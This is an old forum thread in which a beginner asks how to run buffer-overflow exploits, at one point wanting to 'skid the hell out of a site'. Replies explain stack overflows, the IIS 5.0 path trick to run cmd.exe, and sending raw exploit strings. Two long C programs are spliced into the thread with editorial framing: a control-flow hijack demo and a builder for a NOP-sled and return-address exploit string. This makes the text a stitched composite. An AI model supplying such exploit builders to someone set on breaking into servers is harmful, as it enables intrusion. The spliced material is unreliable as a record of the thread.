How to execute buffer overflows
Hey guys, just wondering, but before I start reading up on buffer overflows, I want to know if they're mostly remotely executable and how most of them are done :P I know the three exploits for Apache 2.0 my friend's server is running are all buffer overflows; he said he'd let me get into it before he updates his server. But I just want to know if buffer overflows are, for the most part, remotely exploitable, and if Apache 2.0's exploits are remotely exploitable. They can be found with a quick Google search for "apache server 2.0 exploits." Thanks guys!
Buffer overflows are executable wherever there is an app running that is vulnerable to this attack. If that service is a networked app then it is probably remotely exploitable. Whatever means a user has of accessing the service is the same way an attacker can exploit the program. If the program is not networked then it is probably just a priv escalation, DoS, crash, etc.
suid
I know, I'm sorry I don't know more about them, I just found a nice ebook I'm going to read. I was just looking for an answer as to whether or not they were remotely exploitable, and it was quickly answered, thanks guys :) I'm not going to try and exploit anything yet, but after reading up on the Apache 2.0 server exploits, how would I execute them? I don't want to do anything yet, because I want a full understanding before I skid the hell out of a site. But just to null my curiosity :P
They are executed by creating/downloading programming code that exploits the vulnerability and then inserts a "payload" into the system's memory so it is executed. The payload is usually in assembler, and does things like opening remote programs or creating shells.
That's a severely oversimplified version, and the process can vary depending on the exploit type, but that's generally how it goes.
Hmm, alright, I read part of the ebook, and it just assumes I know how to execute them. Like, for example, the infamous IIS 5.0 buffer overflow, it's something like http:site.com/255%/script/%255/c:/cmd.exe or something along those lines. Anyway, say I found a buffer overflow, how would I execute the shellcode? Could anyone explain it to me? Or point me to an ebook/tutorial? I'm sort of grasping this concept, but I can't quite fit my head around it. There's a lot of things I can't quite fit together yet, like executing the shellcode remotely for example. Thanks for any replies.
Hey there,
I hate to burst your bubble.
What you've quoted isn't exactly a 'buffer overflow exploit' and has nothing strictly to do with 'shellcode' (this is a different term completely). It is, however, an exploit of paths and how IIS filters the HTTP 'path' (I guess it's called) passed to it before it then reads the file and decides either to:
- display it as HTML/image/etc. to the client, or
- execute something, such as ASP or PHP, and then return the output to the client.
IIS assumes all paths are relative to the wwwroot directory, so you can essentially change directory and, as you correctly state, run DOS/Command Prompt on the server. However, do not confuse the term 'shellcode' in this, because that is primarily used where raw opcode instructions are involved and you're overfilling an array of values / block of memory of fixed size within the program where it uses non-memory-safe functions.
For buffer overflow in IIS 5.0 you need to be looking at the "Host: " part of the HTTP request and what IIS does with it. You'll need some knowledge of Assembly, CPU and how instructions are carried out, (maybe) memory addressing schemes, how functions are executed and knowledge of the stack for the parameters to the function.
In main system memory, there are three segment "types":
- Data
- Code and
- Stack
A lot of buffer overflows are done by exploiting the stack segment of the program where it uses non-memory-safe functions. I believe there are other forms of doing buffer overflow.
To exploit it you add some opcodes to "jump" (by setting the instruction pointer) to the address at which they're "injected" onto the stack, and then it will execute what you put after that address in place of the original program's functionality.
This often requires disassembling the code to find the point at which it does all this, and to know what various register values are so that you can do a short relative memory-address jump rather than a jump to an absolute memory address; this is because we cannot guarantee that IIS is loaded into memory in the "same place" every time.
Correct me if I am wrong here, I am no expert on this as I've only ever read about it and tried a few examples
http://www.tonews.com/thread/730158/viwa/crack/and/hack/hacking_iis_50_the_complete_guide.html This might be of use.
Note: We don't normally say "remotely execute the code" if you consider that, in this case, each system is separate… some code runs "locally" on the server (IIS), and some on the client (web browser / some program with sockets that imitates a web browser request). So the term "remote" is a bit redundant and misleading.
You will, however, see the terms "remote code injection" or "remote file include" in things like ASP/PHP script exploits.
Again, if I have used terminology incorrectly let me know I'm a bit rusty
Hope this helps!
Jim,
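The mechanism described in the two replies above (exploit code copies bytes past a fixed-size buffer, and an address the program later jumps through is replaced) as an added, self-contained example. This is not code from the thread, from IIS or from Apache; every name in it (handle_request, unsafe_copy, win, build_exploit) is invented for the demonstration. It deliberately overwrites a function pointer that sits right after the buffer inside the same struct instead of a saved return address, because a saved-return-address overwrite cannot be demonstrated portably under stack protectors and ASLR; the redirection is the same idea. The "payload" is an existing function (win) rather than injected shellcode, so the demo also runs on non-executable stacks. The address of win is taken from inside the process, which is why no guessing is needed here, unlike the IIS case.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Flag set when control flow reaches win(): the attacker's goal in this demo. */
static int win_called = 0;

/* Code the program never intends to run. In a real exploit this would be
 * injected shellcode or an existing routine the attacker finds useful. */
static void win(void) { win_called = 1; }

/* The routine the program actually intends to call. */
static void safe_handler(void) { }

/* A fixed-size buffer followed by an address the program later jumps through.
 * C fixes the layout: buf at offset 0, handler right after it (offset 16 on
 * common ABIs; the code uses offsetof() rather than assuming). */
struct request {
    char buf[16];
    void (*volatile handler)(void);   /* volatile: force a real reload after the copy */
};

/* Non-memory-safe copy: trusts the caller's length exactly as strcpy() trusts
 * the terminating NUL. noinline hides the 16-byte bound from the optimizer so
 * the out-of-bounds writes are performed as written. */
__attribute__((noinline))
static void unsafe_copy(char *dst, const char *src, size_t n)
{
    for (size_t i = 0; i < n; i++)
        dst[i] = src[i];
}

/* Vulnerable service routine: copies attacker-controlled bytes into the
 * 16-byte buffer with no bounds check, then calls through the neighbouring
 * pointer. Returns 1 if win() was reached, 0 otherwise. */
int handle_request(const char *input, size_t len)
{
    struct request r;
    win_called = 0;
    r.handler = safe_handler;
    unsafe_copy(r.buf, input, len);   /* len > 16 spills into r.handler */
    r.handler();                      /* jumps wherever the bytes now point */
    return win_called;
}

/* Build the exploit string: filler up to the pointer, then the target address
 * in native byte order. Returns bytes written, or 0 if it does not fit. */
size_t build_exploit(char *out, size_t cap, void (*target)(void))
{
    size_t off = offsetof(struct request, handler);
    size_t total = off + sizeof target;
    if (total > cap)
        return 0;
    memset(out, 'A', off);                      /* filler reaches the pointer */
    memcpy(out + off, &target, sizeof target);  /* overwrite it with &win */
    return total;
}

/* Zero bytes inside the address: a strcpy()-style copy stops at the first one,
 * which is why NUL-free addresses matter for string-based overflows. */
size_t nul_bytes_in_address(void (*target)(void))
{
    unsigned char raw[sizeof target];
    memcpy(raw, &target, sizeof target);
    size_t count = 0;
    for (size_t i = 0; i < sizeof raw; i++)
        if (raw[i] == 0)
            count++;
    return count;
}

/* Builds the exploit string and fires it at the vulnerable routine. */
int demo_exploit(void)
{
    char payload[64];
    size_t n = build_exploit(payload, sizeof payload, win);
    return n ? handle_request(payload, n) : 0;
}

int main(void)
{
    printf("benign request reaches win():     %d\n", handle_request("hello", 5));
    printf("overflowed request reaches win(): %d\n", demo_exploit());
    printf("NUL bytes in &win:                %zu\n", nul_bytes_in_address(win));
    return 0;
}
```

Compile with an ordinary `cc demo.c -o demo`; the benign request returns 0 and the 24-byte overflowing request returns 1. The last line of output is the caveat Jim's follow-up gets at: on 64-bit systems the address contains zero bytes, so the same overwrite through strcpy() would be cut short, which is one reason exploit strings are built and sent by a program rather than typed.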
Hey, one last question: I read that article you gave me; it was invaluable, I loved it. However, it says that the IIS 5.0 exploit is vulnerable via the URL (duh); however, most people recommend netcat for these types of exploits… if I'm going to start running buffer overflows and server exploits, what tools should I use? And if anyone says Firefox, I'm just going to feel really dumb. :angry:
No no, not a dumb question I think, given that you've not learned anything about networks (data is sent as packets, so-called "datagram" structures, at the application level).
Think about what it is you're trying to pass to the server in the URL:
- If it's just [a-zA-Z0-9] text-type characters rather than raw bytes / opcodes, then yes, in the original case you posted about, you can use a web browser. This exploit doesn't provide you with an interactive interface to the command prompt you initiate on the server; rather, you can tell it to execute a command and you might get some feedback.
- If you're doing buffer overflow stuff, you may be better off learning a programming language that gives you the power to open a connection to a host and send it the specifically formatted "exploit string". This may be in the form of a scripting language like Perl/Python; even PHP run on your local machine has capabilities for interfacing with the network.
Why? Well, there are two parts to this: a) we can make sure the program sends the exact binary data to the server, which we cannot be certain a web browser would do (at least I think so).
b) It gives you greater power to manipulate the format of the exploit and hopefully find an exploit that works. It's rather tedious doing this stuff by hand with PuTTY or Telnet and pasting it in, and again we would have problems with the NULL character and all sorts, as the clipboard treats it as a "string" rather than binary if you wrote it out in a text editor.
Once you have done it once, I reckon it is then easier to pick up the example you know and understand how it works, and then apply it again to a similar challenge.
*Addon to previous post: May need a disassembler too… There are many out there: W32DASM, IDA, HVIEW, OllyDbg (freeware) and gdb (open source; Win32 & Linux/UNIX versions).
Hope this suffices!
Jim,
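Jim's point about the "exploit string" (exact bytes, the NULL-character problem, and the relative/absolute address uncertainty from his earlier post) as an added example, not code from the thread or from any tool it mentions. It builds the classic stack-smash layout, NOP sled, then shellcode, then the guessed return address repeated, and then runs the two checks a practitioner wants before sending it: where a strcpy()-style copy would truncate it, and how many bytes a browser or clipboard would not carry verbatim. Assumptions: 32-bit little-endian x86; the return address 0xbffff5a0 is an illustrative pre-ASLR Linux stack value, not one taken from any real target; the "shellcode" is a constructed placeholder of int3 (0xcc) bytes, not real shellcode; function and constant names are invented.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90   /* x86 one-byte no-op: landing anywhere in the sled slides into the shellcode */

/* Classic stack-smash layout: [NOP sled][shellcode][return address x N].
 *   ret_offset : distance from the start of the vulnerable buffer to the saved
 *                return address (found by disassembly or by crashing the target)
 *   ret_addr   : guessed stack address somewhere inside the sled (32-bit,
 *                little-endian x86 assumed here)
 * Returns bytes written, or 0 when the pieces do not fit. */
size_t build_stack_smash(uint8_t *out, size_t cap, size_t ret_offset,
                         uint32_t ret_addr, const uint8_t *sc, size_t sc_len,
                         size_t ret_copies)
{
    if (sc_len > ret_offset || ret_copies == 0)
        return 0;                                  /* shellcode longer than the buffer */
    size_t total = ret_offset + ret_copies * sizeof ret_addr;
    if (total > cap)
        return 0;
    size_t sled = ret_offset - sc_len;
    memset(out, NOP, sled);                        /* tolerance for an inexact address guess */
    memcpy(out + sled, sc, sc_len);
    uint8_t le[4] = { ret_addr & 0xff, (ret_addr >> 8) & 0xff,
                      (ret_addr >> 16) & 0xff, (ret_addr >> 24) & 0xff };
    for (size_t i = 0; i < ret_copies; i++)        /* repeat so an off-by-4 offset still hits */
        memcpy(out + ret_offset + i * sizeof le, le, sizeof le);
    return total;
}

/* Index of the first NUL, or len if there is none. A target that copies with
 * strcpy()/strcat()/sprintf() keeps only this many bytes; everything after the
 * NUL, including the rest of the address, never arrives. */
size_t strcpy_visible_length(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return i;
    return len;
}

/* Bytes outside printable ASCII. A browser URL bar or a clipboard paste into
 * telnet mangles or refuses these; a socket-level script sends them verbatim. */
size_t non_printable_count(const uint8_t *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] < 0x20 || buf[i] > 0x7e)
            n++;
    return n;
}

/* Constructed placeholder standing in for real shellcode: four int3 (0xcc)
 * breakpoints. Real shellcode would be the opcodes for, e.g., exec("/bin/sh"). */
static const uint8_t PLACEHOLDER_SC[4] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Fixed parameters (32-byte buffer, two address copies) so the layout can be
 * inspected byte by byte. demo_byte() returns -1 past the end of the string. */
enum { DEMO_RET_OFFSET = 32, DEMO_RET_COPIES = 2, DEMO_CAP = 64 };

int demo_byte(uint32_t ret_addr, size_t index)
{
    uint8_t buf[DEMO_CAP];
    size_t n = build_stack_smash(buf, sizeof buf, DEMO_RET_OFFSET, ret_addr,
                                 PLACEHOLDER_SC, sizeof PLACEHOLDER_SC, DEMO_RET_COPIES);
    return index < n ? buf[index] : -1;
}

size_t demo_visible_length(uint32_t ret_addr)
{
    uint8_t buf[DEMO_CAP];
    size_t n = build_stack_smash(buf, sizeof buf, DEMO_RET_OFFSET, ret_addr,
                                 PLACEHOLDER_SC, sizeof PLACEHOLDER_SC, DEMO_RET_COPIES);
    return strcpy_visible_length(buf, n);
}

int main(void)
{
    uint8_t buf[DEMO_CAP];
    /* 0xbffff5a0: an illustrative pre-ASLR 32-bit Linux stack address (assumed). */
    size_t n = build_stack_smash(buf, sizeof buf, DEMO_RET_OFFSET, 0xbffff5a0u,
                                 PLACEHOLDER_SC, sizeof PLACEHOLDER_SC, DEMO_RET_COPIES);
    printf("exploit string: %zu bytes, %zu non-printable\n", n, non_printable_count(buf, n));
    printf("bytes a strcpy() would keep with ret 0xbffff5a0: %zu\n", demo_visible_length(0xbffff5a0u));
    printf("bytes a strcpy() would keep with ret 0x08048000: %zu\n", demo_visible_length(0x08048000u));
    return 0;
}
```

With the 0xbffff5a0 guess the whole 40-byte string survives a strcpy(); with 0x08048000 the low byte is zero, so the copy stops at byte 32 and the return address is never written. Most of the string is non-printable, which is the concrete reason a Perl/Python script (or netcat fed from a file) is used instead of a browser.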
Hey, with case 1 like you said, are you referring to SQL injection and RFI? Also I'm reading a book on shellcode, and I'm re-learning C. I learned it back when I was 12 so I'm re-learning quickly, and learning a ton about networking: I stripped it down from the physical layer to the application layer and now I understand how TCP and UDP work and what their heights and downfalls are. However, I don't mean to become a charity case, but I'm a real visual learner, and I can't find any YouTube videos on using shellcode to exploit a server. Could you hop on TeamViewer or something of the sort and demonstrate it for me? If not, that's fine, I'm learning at a steady rate, I'd just learn more that way. And thanks for the help man!
Good that you've read around…
Where did you pluck SQL injection and Remote File Inclusion from? :D You can do those in a browser, or in a program if you want to, the HTTP Server obviously can't differentiate between the two. (They're both unrelated to the first case)
In the first case, nothing you're doing has anything to do with "remote" anything. You're simply telling IIS, which is run as System, to execute Command Prompt which will also be run as System, inherited from IIS.
I've only ever followed some examples on buffer overflow, a long time ago, so it would be useless me attempting to show you anything… I know there is a very good article written on this website which would probably be more suitable. Again for shellcode, you'll need to know assembly.
A visual demonstration of what goes on in memory would probably help you understand all of what is going on; most of the time no one does that, they assume the knowledge and just show the "proof of concept".
But it needs a lot of explanation about various other things, to get it across to someone with minimal knowledge of this low level machine code and how it all works.
Things like: assembly instructions [mov, shl, shr, jmp, jne, jnz…], you might need to know about different addressing schemes (absolute - the value at the address / indirect - a pointer to the value), how functions are called and how their parameters are passed by using the stack, passing by reference (address of an object) and passing by value (passing the value stored in that object)… etc.
I don't have TeamViewer, not sure I can help you much further unless I do some of it myself anyway… Hope this helps…
Jim,
For more on buffer overflows check out www.cultdeadcow.com/cDc_files/cDc-351/.
Thanks for the replies guys! Thanks for the site also, I downloaded the list of tools; so far you guys have been a huge help. And for any other helpful members that come along this post, I'd really love to see you do a buffer overflow, I'm still fairly lost as to how to execute the shellcode. I mean, I get how it's made, but executing it on another server... that's totally beyond me. Thanks guys :)